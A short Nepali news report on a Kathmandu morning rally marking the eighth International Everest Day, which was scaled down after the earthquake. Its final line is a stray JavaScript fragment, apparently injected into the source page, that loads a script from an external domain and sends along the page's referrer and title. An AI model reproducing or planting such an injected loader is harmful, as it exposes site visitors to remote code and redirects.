आठौँ अन्तर्राष्ट्रिय सगरमाथा दिवसको अवसरमा काठमाडौमा प्रभातफेरीको आयोजना गरिएको छ। नेपाल पर्यटन बोर्डमा अवस्थित प्रथम सगरमाथा आरोही तेन्जिङ नोर्गे शेर्पा र सर एड्मन्ड हिलारीको सालिकमा माल्यार्पण गरी सुरु भएको प्रभातफेरी पद्मोदय मोड, पुतलीसडक, कमलादी, घण्टाघर, रत्नपार्क हुँदै पर्यटन बोर्डमा पुगेको थियो। प्रभातफेरीमा संस्कृति पर्यटन तथा नागरिक उड्डयन मन्त्री कृपासुर शेर्पा, सचिव सुरेशमान श्रेष्ठ, मन्त्रालयका उच्चअधिकारी, स्वदेशी तथा विदेशी आरोहीलगायतको सहभागिता रहेको थियो। प्रभातफेरी पछि मन्त्री शेर्पाले सगरमाथा दिवस भव्य रुपमा मनाउन नसकेपनि सबै पर्यटन आवद्ध संघ संस्थाहरुलाई समेटिएर अघि बढेको उल्लेख गर्नुभयो।

नेपालमा सन २००८ देखि अन्तर्राष्ट्रिय सगरमाथा दिवस मनाउन सुरु गरिएको हो। अघिल्लो वर्ष भव्यरुपमा दिवस मनाइएको भएपनि यो वर्ष विनाशकारी भूकम्पको विपत्तिले गर्दा सामान्य कार्यक्रम मात्र गरी मनाउने मन्त्रालयले जनाएको छ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;